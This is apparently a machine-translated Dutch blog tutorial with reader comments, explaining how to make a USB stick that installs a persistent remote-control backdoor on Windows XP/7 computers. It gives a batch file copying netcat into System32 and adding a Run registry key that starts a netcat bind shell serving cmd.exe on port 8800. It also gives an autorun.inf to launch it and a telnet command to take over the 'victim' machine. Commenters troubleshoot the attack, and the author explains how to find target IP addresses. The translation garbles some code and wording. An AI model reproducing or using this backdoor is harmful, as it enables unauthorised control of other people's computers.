Beheer een pc op afstand met een USB-stick

Ahmed EL JAOUARI 2 jaar geleden 4 minuten om te lezen

hoe een achterdeur te injecteren met een usb-sleutel

Laatste update: 10 juli 2023

In eerdere artikelen hebben we gezien hoe u een USB-rootkitsleutel die wachtwoorden herstelt van een computer onder Windows. Vandaag zullen we zien hoe je een USB-sleutel maakt die een achterdeur op een machine opent Windows.

Deze rootkit wordt automatisch uitgevoerd, maakt een achterdeur op een pc Windows en stelt u in staat om op afstand de controle overnemen.

Zoals gewoonlijk dedoel van deze tutorial, is om bedrijfsleiders te laten zien in welke mate het gebruik van sleutels USB kan gevaarlijk zijn. Wat voor bedrijven geldt, geldt niet minder voor particulieren.

Neem de controle over een pc op afstand

Om op afstand de controle over een pc over te nemen met een USB-sleutel, moet u de bovenstaande stappen volgen:

Download de Netcat-tool

Eerst maken we een nieuwe map op onze USB-stick. Dan gaan we downloaden netcat, een hulpprogramma voor het openen van netwerkverbindingen, ofwel UDP of TCP.

U kunt ook de tool Cryptcat, de Netcat-kloon, gebruiken, op voorwaarde dat deze laatste zijn communicatie versleutelt.

Netcat downloaden voor windows

Na het downloaden van Netcat, unzip het in de recent aangemaakte map.

Een .bat-script maken

Vervolgens zullen we een bestand maken achterdeur.bat. Dit kleine bestand heeft twee doelen:

Kopieer de Netcat-bestanden naar de map System32 van de doelcomputer.
Voeg een tekenreekswaarde toe aan het register van de slachtoffer-pc zodat onze achterdeur bij elke opstart kan worden gestart.

Om dit te doen, zullen we een nieuw tekstdocument maken met de teksteditor Kladblok of een andere teksteditor en de onderstaande code plakken:

kopieer *.* "%SYSTEMROOT%/System32"
REG TOEVOEGEN « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v “backdoor” /t “REG_SZ” /d “%SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800”

Een autorun-bestand maken

Nu moeten we het bestand maken autorun.inf.

In deze stap zullen we een nieuwe optie maken in het venster dat verschijnt bij het plaatsen van een USB, waarmee we (eenmaal erop klikken) onze achterdeur op de doelcomputer kunnen installeren.

Open hiervoor een nieuw tekstdocument en voer deze code in:

[Autorun]
open=achterdeur.bat
ACTION=”geef een naam aan deze actie”

Ten slotte slaan we het bestand op onder de hoofdmap van de sleutel onder de naam autorun.inf

Implementeer de gecreëerde achterdeur

Nadat u de USB-sleutel hebt geplaatst, kunt u vanaf elke machine verbinding maken met de computer van het slachtoffer met de volgende opdracht:

telnet 192.168.1.17 8800

192.168.1.17 geeft het IP-adres aan van de externe machine die u moet vervangen. En 8800 is de poort die moet worden gebruikt om verbinding te maken.

En daar ga je! Met deze techniek kun je op afstand de controle over een pc overnemen. U kunt doen wat u wilt: bestanden openen, een zoekopdracht starten, een programma uitvoeren...

Hier is een lijst met opdrachten om de machine op afstand correct te manipuleren: Bestellingen lezen Windows.

Om uit te loggen typt u "uitloggen".

Maak er goed gebruik van.

Remarque: deze truc werkt niet onder Windows 10 et Windows 11. Het werkt alleen maar door Windows En 7 Windows XP.

Als je deze tutorial leuk vond, abonnez-vous à notre nieuwsbrief of volg ons op Google Nieuws zodat je niets mist! Ook kunt u ons steunen door ons een kopje koffie ☕️ aan te bieden. Bedankt voor je ondersteuning !

23 vragen / antwoorden

Ezra zegt:

16 mei 2022 22 om 36 h min

Ik weet niet goed hoe ik verbinding moet maken
Zelfs als we de sleutel verwijderen, zijn we nog steeds verbonden?
En ook op welk niveau zet hij de code?
Naar opdrachtprompt of netcap?

Répondre
anoniem zegt:

April 23 2020 om 15 02 h min

hallo is er een manier om hetzelfde te doen, maar dan aan windows 10?

Répondre
rapeto zegt:

Januari 17 2020 19 om 04 h min

Hallo wanneer ik verbinding wil maken met netcat of iets anders, vraagt het me om een code en ik kan het niet vinden

Répondre
inconnu zegt:

December 16 2016 om 0 04 h min

Ik begrijp het niet. Waar vind je de haven? en waar de opdracht telnet ... in de cmd in te voegen?

Répondre
Theo Wolfersperger zegt:

November 1 2016 om 20 17 h min

hallo, de map autorun.inf werkt niet, ik sla het op als ,
autorun.inf en ik zet het direct op mijn usb-sleutel, maar bij het invoegen
usb-sleutel, wordt niets weergegeven. een beetje hulp alstublieft ??En het commando telnet 192.168.1.17 880, je moet het in CMD typen ??

Répondre
- anoniem zegt:
  
  14 mei 2017 17 om 36 h min
  
  Je bent er zeker van windows 10 volgens mij wel? OMDAT OP windows 10 Ze hebben .inf verwijderd omdat dit de deur openzette voor alle hackers
  
  Répondre
GTA-productie zegt:

Juni 14 2016 om 18 33 h min

de links zijn dood

Répondre
- jean zegt:
  
  Augustus 29 2017 om 21 13 h min
  
  Neen.
  
  Répondre
Juguet Patrick zegt:

April 1 2016 om 15 36 h min

Ahmad hallo,
Zeer interessant artikel, alleen een probleem het werkt niet, ik leg mijn probleem uit.
Ik heb een oude pc xp waarop ik de achterdeur heb geïntroduceerd door je tutorial tot op de letter te volgen.
Wanneer ik telnet start onder ubuntu, kan deze het ip-adres van de xp . niet oplossen
telnet: kon xxx.xxx.x.xx niet oplossen…8800/telnet: naam of dienst niet
een ipconfig in de xp-console bevestigt mij echter dat het de juiste is.
Enig idee?
Bij voorbaat dank en een fijne avond

Répondre
Paul zegt:

Maart 16 2015 om 12 28 h min

Zou daar niet een backslash moeten zijn?
kopieer *.* "%SYSTEMROOT%/System32"
kopieer *.* "%SYSTEMROOT%/System32"
kopieer *.* "%SYSTEMROOT%/System32"
??
Anders ontbreekt het alleen om het te configureren om het IP-adres van de doelcomputer te stelen 🙂

Répondre
lerin zegt:

Februari 5 2015 om 13 58 h min

Hallo, ik ben geïnteresseerd in computerbeveiliging en ik zou graag willen weten of we een achterdeur in een computer maken. Dit vormt een probleem omdat we hier een poort openen op 8800, zodat iedereen er verbinding mee kan maken als ze verzoeken verzenden en de poort zien?
dank u

Répondre
novice zegt:

10 september 2014 14 om 16 h min

Hallo allemaal . Excuseer me voor het feit dat ik op afstand volledige toegang tot deze computer heb, heb ik internet nodig?

Répondre
- Ahmed zegt:
  
  26 september 2014 17 om 46 h min
  
  Precies, je hebt een internetverbinding nodig.
  
  Répondre
  - Killian Armand zegt:
    
    April 29 2015 om 23 04 h min
    
    Hallo, wanneer ik de opdracht in NetCat invoer, retourneert het programma "lookup failed errno 1004 NO_NATA" zoiets als dit ... Kun je me alsjeblieft helpen?
B3 INV!SIBL3 zegt:

Augustus 29 2014 om 15 58 h min

Hallo. Ik heb een klein probleem met deze achterdeur. Ik heb elke stap van de procedure gevolgd, maar wanneer ik mijn USB-sleutel op een andere computer steek, verschijnt er geen optie om NetCat te openen en toegang te krijgen tot mijn eigen computer. Wat moet ik dan doen? Dank u voor uw antwoord !

Répondre
- Max1trick zegt:
  
  Januari 7 2017 20 om 35 h min
  
  Hallo,
  U moet de draagbare software "putty" installeren.
  In "ip-adres": het ip-adres van de doelcomputer
  In "poort": 8800
  En in "verbindingstype": telnet
  
  Répondre
Sean Poirier zegt:

21 mei 2014 16 om 47 h min

Moet de pc absoluut draaien om dit te gebruiken?

Répondre
amine zegt:

20 mei 2014 21 om 04 h min

Hallo, toen ik de bestanden om de achterdeur te maken op de USB-sleutel plaatste, werden al mijn documenten omgezet in snelkoppelingen, ze zijn niet langer bruikbaar. HELP MEEEEEEEEEEEE!!

Répondre
Geïnteresseerd zegt:

April 27 2012 om 22 38 h min

Ik heb geprobeerd toegang te krijgen tot mijn XP-machine door de procedure te volgen, maar het werkt niet... zelfs het uitschakelen van de firewall en antivirus

Répondre
- Ahmed zegt:
  
  2 mei 2012 16 om 00 h min
  
  Kunt u mij de foutmelding geven die verschijnt wanneer u verbinding probeert te maken met telnet?
  
  Répondre
  - Ben Arfa Wy zegt:
    
    November 20 2012 om 20 35 h min
    
    Vooral ik zou graag willen weten hoe ik het ip-adres van de pc kan verkrijgen, welke moet de achterdeur installeren?
  - Ahmed zegt:
    
    Februari 10 2013 om 19 02 h min
    
    Als u het ip-adres van een pc in een lokaal netwerk wilt krijgen, opent u gewoon de cmd en typt u de opdracht net view nadat u de machinenaam hebt gepingd.
    Anders, als je de pc in handen hebt, typ je gewoon in de opdrachtprompt: ipconfig en je hebt het IP-adres
Corentin Coustham zegt:

Maart 18 2012 om 18 46 h min

Wat is het commando in ubuntu?

Répondre

Beheer een pc op afstand met een USB-stick